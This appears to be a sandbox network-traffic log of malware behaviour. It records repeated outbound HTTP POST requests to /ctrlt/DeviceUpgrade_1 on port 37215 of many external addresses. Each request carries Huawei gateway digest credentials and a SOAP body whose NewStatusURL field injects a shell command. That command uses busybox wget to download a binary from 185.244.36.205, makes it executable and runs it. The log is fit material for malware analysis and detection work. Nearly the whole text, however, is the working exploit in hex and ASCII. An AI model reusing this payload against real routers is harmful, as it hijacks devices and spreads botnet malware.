                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              912192.168.2.1556136197.38.111.12137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539263010 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              913192.168.2.1535272222.88.39.18637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539266109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              914192.168.2.1552232181.104.68.8437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539325953 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              915192.168.2.155495894.99.50.22237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539356947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              916192.168.2.153627037.176.72.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539357901 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              917192.168.2.1546840222.184.192.6837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539366961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              918192.168.2.1537488190.11.141.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539370060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              919192.168.2.156047837.79.231.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539371967 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              920192.168.2.153324437.152.147.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539412022 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              921192.168.2.1550956138.49.6.10637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539419889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
